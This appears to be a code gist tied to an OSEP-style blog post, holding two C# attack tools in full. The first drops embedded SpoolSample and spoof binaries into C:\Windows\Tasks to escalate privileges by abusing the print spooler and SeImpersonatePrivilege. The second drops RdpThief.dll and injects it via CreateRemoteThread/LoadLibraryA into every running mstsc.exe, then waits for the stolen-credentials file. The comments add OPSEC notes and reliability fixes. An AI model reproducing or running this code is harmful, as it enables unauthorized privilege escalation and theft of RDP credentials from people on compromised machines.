Taking advantage of Assembly.GetManifestResourceStream for quick dirt hacks, for more details please read: https://tahadraidia.com/posts/taking-advantage-of-assembly.getmanifestresourcestream-for-quick-dirt-hacks/ #OSEP #CSHARP #DOTNET
using System; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Net; | |
using System.Runtime.InteropServices; | |
using System.Security.Principal; | |
using System.Threading; | |
using System.Collections.Generic; | |
using System.Text.RegularExpressions; | |
namespace LPEPrintBug | |
{ | |
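public static class Program
{
    // Access right passed to OpenProcessToken: enough to read privileges, nothing more.
    public const uint TOKEN_QUERY = 0x00000008;

    [StructLayout(LayoutKind.Sequential)]
    public struct LUID_AND_ATTRIBUTES
    {
        public LUID Luid;
        public UInt32 Attributes;
        public const UInt32 SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x00000001;
        public const UInt32 SE_PRIVILEGE_ENABLED = 0x00000002;
        public const UInt32 SE_PRIVILEGE_REMOVED = 0x00000004;
        public const UInt32 SE_PRIVILEGE_USED_FOR_ACCESS = 0x80000000;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct LUID
    {
        public UInt32 LowPart;
        public Int32 HighPart;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct PRIVILEGE_SET
    {
        public uint PrivilegeCount;
        public uint Control; // PRIVILEGE_SET_ALL_NECESSARY: every listed privilege must be enabled
        public const uint PRIVILEGE_SET_ALL_NECESSARY = 1;
        [MarshalAs(UnmanagedType.ByValArray, SizeConst = 1)]
        public LUID_AND_ATTRIBUTES[] Privilege;
    }

    [DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out LUID lpLuid);

    [DllImport("advapi32.dll", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    static extern bool OpenProcessToken(IntPtr ProcessHandle, UInt32 DesiredAccess, out IntPtr TokenHandle);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr GetCurrentProcess();

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);

    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool PrivilegeCheck(
        IntPtr ClientToken,
        ref PRIVILEGE_SET RequiredPrivileges,
        out bool pfResult
    );

    /// <summary>
    /// Returns true when <paramref name="Privilege"/> (e.g. "SeImpersonatePrivilege") is held
    /// AND currently enabled in the calling process' primary token.
    /// </summary>
    /// <remarks>
    /// PrivilegeCheck only counts privileges that are enabled: a privilege that is present but
    /// disabled yields false here, even though AdjustTokenPrivileges could enable it.
    /// Every Win32 failure (cannot open the token, unknown privilege name, PrivilegeCheck error)
    /// is reported as false rather than thrown. The token handle is always closed.
    /// </remarks>
    public static bool IsPrivilegeEnabled(string Privilege)
    {
        if (String.IsNullOrEmpty(Privilege)) return false;

        // GetCurrentProcess returns a pseudo-handle; it does not need CloseHandle.
        IntPtr hProcess = GetCurrentProcess();
        if (hProcess == IntPtr.Zero) return false;

        IntPtr hToken;
        if (!OpenProcessToken(hProcess, TOKEN_QUERY, out hToken)) return false;
        try
        {
            LUID luid;
            if (!LookupPrivilegeValue(null, Privilege, out luid)) return false;

            PRIVILEGE_SET privs = new PRIVILEGE_SET
            {
                PrivilegeCount = 1,
                Control = PRIVILEGE_SET.PRIVILEGE_SET_ALL_NECESSARY,
                Privilege = new LUID_AND_ATTRIBUTES[1]
            };
            privs.Privilege[0].Luid = luid;
            privs.Privilege[0].Attributes = LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED;

            bool enabled;
            if (!PrivilegeCheck(hToken, ref privs, out enabled)) return false;
            return enabled;
        }
        finally
        {
            CloseHandle(hToken); // the original returned early on several paths and leaked this handle
        }
    }

    /// <summary>
    /// Copies the embedded manifest resource <paramref name="resourceName"/> to
    /// <paramref name="fileName"/>, overwriting any existing file.
    /// </summary>
    /// <remarks>
    /// Failures are printed to stdout rather than thrown; callers verify with File.Exists.
    /// <paramref name="resourceName"/> must match an entry of GetManifestResourceNames() exactly
    /// (case-sensitive, including any namespace prefix the build added), otherwise the stream is null.
    /// A partially written file is deleted so a later File.Exists check cannot trust a truncated binary.
    /// </remarks>
    public static void WriteResourceToFile(string resourceName, string fileName)
    {
        try
        {
            using (Stream input = System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceName))
            {
                if (input == null)
                {
                    Console.WriteLine("Embedded resource not found: " + resourceName);
                    return;
                }
                using (Stream output = new FileStream(fileName, FileMode.Create, FileAccess.Write))
                {
                    byte[] buffer = new byte[4096];
                    int byteCount;
                    while ((byteCount = input.Read(buffer, 0, buffer.Length)) > 0)
                    {
                        output.Write(buffer, 0, byteCount);
                    }
                }
            }
        }
        catch (Exception e)
        {
            Console.WriteLine("Failed to write " + fileName + ": " + e.Message);
            try { File.Delete(fileName); } catch (Exception) { /* best effort cleanup */ }
        }
    }

    /// <summary>
    /// Entry point. Drops the embedded helper binaries into C:\Windows\Tasks (only those not
    /// already present), then launches spoof.exe followed by SpoolSample.exe.
    /// Pre-conditions: the caller is not already an Administrator, and SeImpersonatePrivilege
    /// is enabled in the current token.
    /// </summary>
    /// <remarks>
    /// Exit codes: 0 when there is nothing to do (already admin), 1 when a pre-condition or a
    /// file drop fails. OPSEC: nothing here removes the dropped binaries afterwards; clean up
    /// C:\Windows\Tasks when the engagement step is done.
    /// </remarks>
    public static void Main()
    {
        WindowsIdentity identity = WindowsIdentity.GetCurrent();
        WindowsPrincipal principal = new WindowsPrincipal(identity);
        // NOTE: under UAC an administrator running with a filtered (medium-integrity) token is
        // not in this role, so such a user is not stopped here.
        if (principal.IsInRole(WindowsBuiltInRole.Administrator))
        {
            Console.WriteLine("Already Administrator!");
            Environment.Exit(0);
        }

        if (!IsPrivilegeEnabled("SeImpersonatePrivilege"))
        {
            Console.WriteLine("SeImpersonatePrivilege privilege is required.");
            Environment.Exit(1);
        }

        const string spoolsample = @"C:\Windows\Tasks\SpoolSample.exe";
        const string spoof = @"C:\Windows\Tasks\spoof.exe";
        // local.exe is only dropped, never launched by this program (presumably spoof.exe uses it).
        const string local = @"C:\Windows\Tasks\local.exe";
        string hostname = Dns.GetHostName();

        // Each helper is embedded under its bare file name (the original regex extracted the same
        // "<name>.exe" token; Path.GetFileName does so without an unescaped '.' in the pattern).
        foreach (string file in new[] { spoolsample, spoof, local })
        {
            if (!File.Exists(file))
            {
                WriteResourceToFile(Path.GetFileName(file), file);
            }
        }

        // The writes above complete synchronously; this is only a grace period kept from the original.
        Thread.Sleep(3000);

        if (!File.Exists(spoof) || !File.Exists(spoolsample))
        {
            Console.WriteLine("Helper binaries missing on disk, bail!");
            Environment.Exit(1);
        }

        // spoof.exe goes first so its pipe server is up before SpoolSample makes the spooler
        // connect to it. The original gated the second launch on th1.ThreadState == Running, which
        // is usually already false because Runner.Execute returns as soon as Process.Start does,
        // leaving SpoolSample unstarted; running them in order has no such race.
        string spoolsampleparam = String.Format("{0} {0}/pipe/test", hostname);
        new Runner(spoof, @"\\.\pipe\test\pipe\spoolss").Execute();
        Thread.Sleep(1000); // heuristic pause for the pipe server to initialise — TODO confirm it is needed
        new Runner(spoolsample, spoolsampleparam).Execute();
    }
}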
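/// <summary>
/// Launches one external process (file name plus argument string) without waiting for it.
/// Any failure to start terminates the whole tool with exit code 1.
/// </summary>
public class Runner
{
    private readonly string filename;
    private readonly string param;

    /// <param name="filename">Path of the executable to start.</param>
    /// <param name="param">Raw command-line arguments passed to it.</param>
    public Runner(string filename, string param)
    {
        this.filename = filename;
        this.param = param;
    }

    /// <summary>
    /// Starts the process. Non-blocking: returns as soon as Process.Start has returned.
    /// Process.Start throws (e.g. Win32Exception) when the file is missing or not executable;
    /// that is caught and treated like a false return instead of taking down the thread.
    /// </summary>
    public void Execute()
    {
        bool started = false;
        try
        {
            // Disposing the Process object releases our handle only; the child keeps running.
            using (Process pr = new Process())
            {
                pr.StartInfo = new ProcessStartInfo
                {
                    FileName = filename,
                    Arguments = param
                };
                started = pr.Start();
            }
        }
        catch (Exception e)
        {
            Console.WriteLine("Failed to start " + filename + ": " + e.Message);
        }

        if (!started)
        {
            Console.WriteLine("Something went wrong, bail!");
            Environment.Exit(1);
        }
    }
}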
} |
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
namespace RDPThiefInjector | |
{ | |
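public class Program
{
    // OpenProcess rights that CreateRemoteThread/WriteProcessMemory document as required:
    // PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ.
    // The original asked for PROCESS_ALL_ACCESS (0x001F0FFF), far more than the injection needs.
    private const uint InjectAccess = 0x0002 | 0x0400 | 0x0008 | 0x0020 | 0x0010;
    private const uint MEM_COMMIT_RESERVE = 0x3000;
    // The remote buffer only holds a path string for LoadLibraryA to read; it never executes,
    // so PAGE_READWRITE suffices (the original used PAGE_EXECUTE_READWRITE, a needless RWX region).
    private const uint PAGE_READWRITE = 0x04;

    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);

    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress,
        byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

    [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
    static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
    public static extern IntPtr GetModuleHandle(string lpModuleName);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);

    /// <summary>
    /// Copies the embedded manifest resource <paramref name="resourceName"/> to
    /// <paramref name="fileName"/>, overwriting any existing file.
    /// </summary>
    /// <remarks>
    /// Failures are printed to stdout rather than thrown; callers verify with File.Exists.
    /// <paramref name="resourceName"/> must match an entry of GetManifestResourceNames() exactly
    /// (case-sensitive, including any namespace prefix the build added), otherwise the stream is null.
    /// A partially written file is deleted so a later File.Exists check cannot trust a truncated binary.
    /// </remarks>
    public static void WriteResourceToFile(string resourceName, string fileName)
    {
        try
        {
            using (Stream input = System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceName))
            {
                if (input == null)
                {
                    Console.WriteLine("Embedded resource not found: " + resourceName);
                    return;
                }
                using (Stream output = new FileStream(fileName, FileMode.Create, FileAccess.Write))
                {
                    byte[] buffer = new byte[4096];
                    int byteCount;
                    while ((byteCount = input.Read(buffer, 0, buffer.Length)) > 0)
                    {
                        output.Write(buffer, 0, byteCount);
                    }
                }
            }
        }
        catch (Exception e)
        {
            Console.WriteLine("Failed to write " + fileName + ": " + e.Message);
            try { File.Delete(fileName); } catch (Exception) { /* best effort cleanup */ }
        }
    }

    /// <summary>
    /// Writes <paramref name="pathBytes"/> (a NUL-terminated ANSI path) into process
    /// <paramref name="pid"/> and starts a remote thread at <paramref name="loadLib"/>
    /// (LoadLibraryA) with that buffer as its argument.
    /// </summary>
    /// <returns>true when the remote thread was created; false on any failure (never throws).</returns>
    /// <remarks>
    /// The process and thread handles are always closed. The remote buffer is deliberately not
    /// freed: LoadLibraryA reads it asynchronously, so freeing it here would race the new thread.
    /// </remarks>
    private static bool InjectPath(int pid, byte[] pathBytes, IntPtr loadLib)
    {
        IntPtr hProcess = OpenProcess(InjectAccess, false, pid);
        if (hProcess == IntPtr.Zero)
        {
            Console.WriteLine("OpenProcess(" + pid + ") failed, error " + Marshal.GetLastWin32Error());
            return false;
        }
        try
        {
            IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)pathBytes.Length, MEM_COMMIT_RESERVE, PAGE_READWRITE);
            if (addr == IntPtr.Zero)
            {
                Console.WriteLine("VirtualAllocEx(" + pid + ") failed, error " + Marshal.GetLastWin32Error());
                return false;
            }

            IntPtr written;
            if (!WriteProcessMemory(hProcess, addr, pathBytes, pathBytes.Length, out written)
                || written.ToInt64() != pathBytes.Length)
            {
                Console.WriteLine("WriteProcessMemory(" + pid + ") failed, error " + Marshal.GetLastWin32Error());
                return false;
            }

            IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, loadLib, addr, 0, IntPtr.Zero);
            if (hThread == IntPtr.Zero)
            {
                Console.WriteLine("CreateRemoteThread(" + pid + ") failed, error " + Marshal.GetLastWin32Error());
                return false;
            }
            CloseHandle(hThread);
            return true;
        }
        finally
        {
            CloseHandle(hProcess); // the original never closed this handle
        }
    }

    /// <summary>
    /// Entry point. Drops the embedded RdpThief.dll to C:\Windows\Tasks\rdp.dll, then once per
    /// second injects it (via LoadLibraryA) into every mstsc.exe not yet injected, until
    /// %TMP%\data.bin exists, at which point the program exits with code 0.
    /// </summary>
    /// <remarks>
    /// The original exited unconditionally after the first loop iteration because the
    /// Environment.Exit following the File.Exists(creds) check was outside the if-statement;
    /// it also re-injected every mstsc on every tick, creating a new remote thread each second.
    /// The LoadLibraryA address is looked up in this process and reused in the target; this
    /// only works when this injector and mstsc have the same bitness — TODO confirm the build target.
    /// OPSEC: rdp.dll is not removed from disk when the program ends.
    /// </remarks>
    public static void Main()
    {
        const String dllName = @"C:\Windows\Tasks\rdp.dll";
        string tmp = Environment.GetEnvironmentVariable("TMP");
        if (String.IsNullOrEmpty(tmp))
        {
            tmp = Path.GetTempPath(); // original produced "/data.bin" when TMP was unset
        }
        String creds = Path.Combine(tmp, "data.bin");

        WriteResourceToFile("RdpThief.dll", dllName);
        if (!File.Exists(dllName))
        {
            Console.WriteLine("Failed to drop " + dllName);
            Environment.Exit(1);
        }
        Console.WriteLine("Program Strated ...");

        IntPtr loadLib = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
        if (loadLib == IntPtr.Zero)
        {
            Console.WriteLine("Could not resolve LoadLibraryA");
            Environment.Exit(1);
        }

        // LoadLibraryA needs a NUL-terminated ANSI string; the original wrote dllName.Length bytes
        // and relied on the freshly committed page being zero-filled for the terminator.
        byte[] pathBytes = Encoding.ASCII.GetBytes(dllName + "\0");
        HashSet<int> injected = new HashSet<int>();

        while (true)
        {
            if (!File.Exists(dllName))
            {
                Console.WriteLine(dllName + " disappeared from disk, bail!");
                Environment.Exit(1);
            }

            foreach (Process proc in Process.GetProcessesByName("mstsc"))
            {
                using (proc)
                {
                    if (injected.Contains(proc.Id)) continue;
                    if (InjectPath(proc.Id, pathBytes, loadLib))
                    {
                        injected.Add(proc.Id);
                    }
                }
            }

            if (File.Exists(creds))
            {
                Console.WriteLine("Found: " + creds);
                Environment.Exit(0);
            }
            Thread.Sleep(1000);
        }
    }
}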
} |